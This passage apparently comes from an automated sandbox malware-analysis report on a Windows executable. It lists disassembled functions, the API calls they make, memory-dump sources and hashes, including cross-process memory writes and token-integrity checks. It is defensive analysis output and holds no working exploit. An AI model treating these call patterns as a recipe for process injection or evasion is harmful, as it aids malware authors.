              • Opcode Fuzzy Hash: 46c29ee6f40aae3392edb36b7141924725b29e81600343922eb0383382c791a5
              • Instruction Fuzzy Hash: AD2183708023C5EBFB119F25EC147EA3B66BF82355F508216F411961B1D3786991CFA9
              Function 00735711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: 3f2e4c3d88e27bb5e2191a8f1a103aad459d26c6ac221e37f1ba69efa9c3e274
              • Instruction ID: 84c72cc5346b14f715b544cfe7a9be39fc60dda1a4d372a90a0027f9fc4f0163
              • Opcode Fuzzy Hash: 3f2e4c3d88e27bb5e2191a8f1a103aad459d26c6ac221e37f1ba69efa9c3e274
              • Instruction Fuzzy Hash: 5401B5A2645A09FBF2085520AD92FBB735E9B32394F414024FE099E242FB69ED10C2F4
              Function 00702DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,?,?,006FF2DE,00703863,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6), ref: 00702DFD
              • _free.LIBCMT ref: 00702E32
              • _free.LIBCMT ref: 00702E59
              • SetLastError.KERNEL32(00000000,006D1129), ref: 00702E66
              • SetLastError.KERNEL32(00000000,006D1129), ref: 00702E6F
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: e4f7ef0963664a22b3dc2eb0b91ef8cd22e1c1fe56b1f2ea9e8c1035e29cb44f
              • Instruction ID: 23a8940158230e5a544c661bef658b9bda3e0af1a0b4cbfbac2a79d429bece7a
              • Opcode Fuzzy Hash: e4f7ef0963664a22b3dc2eb0b91ef8cd22e1c1fe56b1f2ea9e8c1035e29cb44f
              • Instruction Fuzzy Hash: 9B01F977285600E7C6137735AC4ED2B26DDABD17A57214725F455A22E3EA6C8C034128
              Function 0073000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
              Download Yara Rule
              APIs
              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?,?,0073035E), ref: 0073002B
              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?), ref: 00730046
              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?), ref: 00730054
              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?), ref: 00730064
              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?), ref: 00730070
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: From$Prog$FreeStringTasklstrcmpi
              • String ID:
              • API String ID: 3897988419-0
              • Opcode ID: ad108b04b3712494612fabfd14a396811699769d10f30725add0bfaeb86995a9
              • Instruction ID: b84704426ecc6dbb9d9d7129f51ee4371e21350b2523666cc00bd2b7fd2cb62b
              • Opcode Fuzzy Hash: ad108b04b3712494612fabfd14a396811699769d10f30725add0bfaeb86995a9
              • Instruction Fuzzy Hash: FA01DF76600309BFEB214F68DC48BBA7AADEB44751F108024F846D7211D7B8CD009BA0
              Function 0073E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
              Download Yara Rule
              APIs
              • QueryPerformanceCounter.KERNEL32(?), ref: 0073E997
              • QueryPerformanceFrequency.KERNEL32(?), ref: 0073E9A5
              • Sleep.KERNEL32(00000000), ref: 0073E9AD
              • QueryPerformanceCounter.KERNEL32(?), ref: 0073E9B7
              • Sleep.KERNEL32 ref: 0073E9F3
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: PerformanceQuery$CounterSleep$Frequency
              • String ID:
              • API String ID: 2833360925-0
              • Opcode ID: a062e0d54be5c442c9925c6900f1223f570fe923241d70a759d714fcdf92453e
              • Instruction ID: bc16ca5fbcbd681ea97c12ba5cb0701679c4cc1ded00a66a9ac2e129a9a9d960
              • Opcode Fuzzy Hash: a062e0d54be5c442c9925c6900f1223f570fe923241d70a759d714fcdf92453e
              • Instruction Fuzzy Hash: ED015B71C0162DDBDF04ABE4DC596EDBB78BB09301F004546E542B2282DB78A5518766
              Function 007310F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
              Download Yara Rule
              APIs
              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00731114
              • GetLastError.KERNEL32(?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731120
              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 0073112F
              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731136
              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0073114D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
              • String ID:
              • API String ID: 842720411-0
              • Opcode ID: c52cb0ed7f343c6512b2faf2172b676ec72e470ff92063741e0a04a29604aee3
              • Instruction ID: 751f16a0af8128da62e7db3c9bcc28e4ff0baaa9f0ede3369ee2036e6d6e3743
              • Opcode Fuzzy Hash: c52cb0ed7f343c6512b2faf2172b676ec72e470ff92063741e0a04a29604aee3
              • Instruction Fuzzy Hash: F20181B5200309BFEB124F69DC49EAA3F6EEF85360F104414FA86C3350DB75DC008A60
              Function 00730FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
              Download Yara Rule
              APIs
              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00730FCA
              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00730FD6
              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00730FE5
              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00730FEC
              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00731002
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: HeapInformationToken$AllocErrorLastProcess
              • String ID:
              • API String ID: 44706859-0
              • Opcode ID: c0d5c37e8ee2e9bfba0e9ba87dbd487c5b454c2fe7ad603b557ca32c83a549b6
              • Instruction ID: 08779c8ab0c7360a32ca40ba0f0f60029bda0de70560245c4b9f817a8ac8b736
              • Opcode Fuzzy Hash: c0d5c37e8ee2e9bfba0e9ba87dbd487c5b454c2fe7ad603b557ca32c83a549b6
              • Instruction Fuzzy Hash: 66F06275200305FBD7264FA5DC4DF663B6DEF8A761F508414F986D7251CAB9DC408A60
              Function 00731014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
              Download Yara Rule
              APIs
              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0073102A
              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00731036
              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00731045
              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0073104C
              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00731062
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: HeapInformationToken$AllocErrorLastProcess
              • String ID:
              • API String ID: 44706859-0
              • Opcode ID: 0f81a31bd8689fa68dc575c3425c8eeb05d34f62aca6fce8d24d84c54243a275
              • Instruction ID: c09f3ef9309ede120a19be1d42a9c14f587dbe8ba1e0c1e8c06833329bc06974
              • Opcode Fuzzy Hash: 0f81a31bd8689fa68dc575c3425c8eeb05d34f62aca6fce8d24d84c54243a275
              • Instruction Fuzzy Hash: 2DF0CD75300305FBEB221FA5EC49F663BADEF8A761F104414FA86D7251CAB9DC408A60
              Function 0074030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
              Download Yara Rule
              APIs
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 00740324
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 00740331
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 0074033E
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 0074034B
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 00740358
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 00740365
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID:
              • API String ID: 2962429428-0
              • Opcode ID: dabc9760f0d1e328b93be0c955742ab23f928549967abec637c6dfb23f06a861
              • Instruction ID: 3f6611560d59635a3a03326f2c90280cac5449067e5e6fd0d641e1f9ee46be24
              • Opcode Fuzzy Hash: dabc9760f0d1e328b93be0c955742ab23f928549967abec637c6dfb23f06a861
              • Instruction Fuzzy Hash: 6001AA72800B159FCB30AF66D890812FBF9BF603153168A3FD29652931C3B5A998CF80
              Function 0070D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 0070D752
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 0070D764
              • _free.LIBCMT ref: 0070D776
              • _free.LIBCMT ref: 0070D788
              • _free.LIBCMT ref: 0070D79A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 05bd93dfe6b6ff00b926000bcb69be2d69dab3930f38094c9fab66d70934ceeb
              • Instruction ID: 9dee420b74a19c28a0cf68e3014b8fe77ed44d2d56ce4267b9c84261ee963315
              • Opcode Fuzzy Hash: 05bd93dfe6b6ff00b926000bcb69be2d69dab3930f38094c9fab66d70934ceeb
              • Instruction Fuzzy Hash: 85F0FF33554304EBCA22EBA8F9CAC1677DDBB447107A55A06F048E7592C72CFC818AA4
              Function 007022A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 007022BE
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 007022D0
              • _free.LIBCMT ref: 007022E3
              • _free.LIBCMT ref: 007022F4
              • _free.LIBCMT ref: 00702305
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: fcda286688f572c2476941eec2ee46e91bee4a3a2c3b8cdbb08364ee3692b88e
              • Instruction ID: 538939280bcdae49d0ffc4aac9c2f3564cc9ef2b9bbf295d0578a20915657fd0
              • Opcode Fuzzy Hash: fcda286688f572c2476941eec2ee46e91bee4a3a2c3b8cdbb08364ee3692b88e
              • Instruction Fuzzy Hash: A0F01D76520110CFCA12AF54BC099483AA4B75A750B918607F410E22F2C73C58129EEC
              Function 006E95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
              Download Yara Rule
              APIs
              • EndPath.GDI32(?), ref: 006E95D4
              • StrokeAndFillPath.GDI32(?,?,007271F7,00000000,?,?,?), ref: 006E95F0
              • SelectObject.GDI32(?,00000000), ref: 006E9603
              • DeleteObject.GDI32 ref: 006E9616
              • StrokePath.GDI32(?), ref: 006E9631
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Path$ObjectStroke$DeleteFillSelect
              • String ID:
              • API String ID: 2625713937-0
              • Opcode ID: 854d9afc285e5aeb5706be3b855f6f29f0a8b6c6dc84535a4e252d34981f427e
              • Instruction ID: b5ce68a412ee71cd8e1b9f91f7f512db826cc82eeeb8c7a37272f2fdb649e6c5
              • Opcode Fuzzy Hash: 854d9afc285e5aeb5706be3b855f6f29f0a8b6c6dc84535a4e252d34981f427e
              • Instruction Fuzzy Hash: 07F08C30006388EBEB165F26EC1C7B63B62AB82322F40C215F466561F0C7789995CF29
              Function 00700F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: __freea$_free
              • String ID: a/p$am/pm
              • API String ID: 3432400110-3206640213
              • Opcode ID: 8f9228bec59e0be2e21d2c6cf12a834855b76cb223000d622c16db28d5693851
              • Instruction ID: f59501ca3bff1eb1902d25173fea9d3145c05ce0c0111ec3d89762ef91c33f08
              • Opcode Fuzzy Hash: 8f9228bec59e0be2e21d2c6cf12a834855b76cb223000d622c16db28d5693851
              • Instruction Fuzzy Hash: 28D1E231A00206DADB289F68C895BFAB7F5FF06300FA44359E9419BAD1D77D9D80CB91
              Function 007561D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006F0242: EnterCriticalSection.KERNEL32(007A070C,007A1884,?,?,006E198B,007A2518,?,?,?,006D12F9,00000000), ref: 006F024D
                • Part of subcall function 006F0242: LeaveCriticalSection.KERNEL32(007A070C,?,006E198B,007A2518,?,?,?,006D12F9,00000000), ref: 006F028A
                • Part of subcall function 006F00A3: __onexit.LIBCMT ref: 006F00A9
              • __Init_thread_footer.LIBCMT ref: 00756238
                • Part of subcall function 006F01F8: EnterCriticalSection.KERNEL32(007A070C,?,?,006E8747,007A2514), ref: 006F0202
                • Part of subcall function 006F01F8: LeaveCriticalSection.KERNEL32(007A070C,?,006E8747,007A2514), ref: 006F0235
                • Part of subcall function 0074359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007435E4
                • Part of subcall function 0074359C: LoadStringW.USER32(007A2390,?,00000FFF,?), ref: 0074360A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
              • String ID: x#z$x#z$x#z
              • API String ID: 1072379062-95117334
              • Opcode ID: 007c4ce0fe769edc934058690f9fdf1cf37f72434fbdb06bfc922d03a69b1c91
              • Instruction ID: 8b1edf8fdd13303a947bf98e78c5fdfb1ed04b986ba59170ab6b6999fc18f95c
              • Opcode Fuzzy Hash: 007c4ce0fe769edc934058690f9fdf1cf37f72434fbdb06bfc922d03a69b1c91
              • Instruction Fuzzy Hash: 03C17C71A00209ABDB14DF58C890EFEB7BAFF49310F508069F9059B251DBB9ED59CB90
              Function 00708A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00708B6E
              • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00708B7A
              • __dosmaperr.LIBCMT ref: 00708B81
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharErrorLastMultiWide__dosmaperr
              • String ID: .o
              • API String ID: 2434981716-1957372423
              • Opcode ID: 27bc20ebc43ff8967df9d345e5f475be9bad67234389b4f5184bf7201c28b367
              • Instruction ID: 4b8cc92f4234fc1a2cf0ba61a188741f996c605d07aa566b67c6004a077d3e88
              • Opcode Fuzzy Hash: 27bc20ebc43ff8967df9d345e5f475be9bad67234389b4f5184bf7201c28b367
              • Instruction Fuzzy Hash: AF418CF0604155EFCB659F64C880A7D7FE6DF86304B2887A9F4C587682DE398C028795
              Function 00732716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0073B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007321D0,?,?,00000034,00000800,?,00000034), ref: 0073B42D
              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00732760
                • Part of subcall function 0073B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0073B3F8
                • Part of subcall function 0073B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0073B355
                • Part of subcall function 0073B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00732194,00000034,?,?,00001004,00000000,00000000), ref: 0073B365
                • Part of subcall function 0073B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00732194,00000034,?,?,00001004,00000000,00000000), ref: 0073B37B
              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007327CD
              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0073281A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
              • String ID: @
              • API String ID: 4150878124-2766056989
              • Opcode ID: eac3997c4ef64c4269b5cdeff22c686b0cda9324d02086de95a1065d277f8673
              • Instruction ID: 0a9c8692b59d17b0ea48739fd9bb4e5d2040e7ad31b27f652f0bceb64923a82b
              • Opcode Fuzzy Hash: eac3997c4ef64c4269b5cdeff22c686b0cda9324d02086de95a1065d277f8673
              • Instruction Fuzzy Hash: 19412E76901218BFEB10DFA4CD45AEEBBB8EF09700F104099FA55B7182DB746E45CBA1
              Function 0070172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
              Download Yara Rule
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\QLLafoDdqv.exe,00000104), ref: 00701769
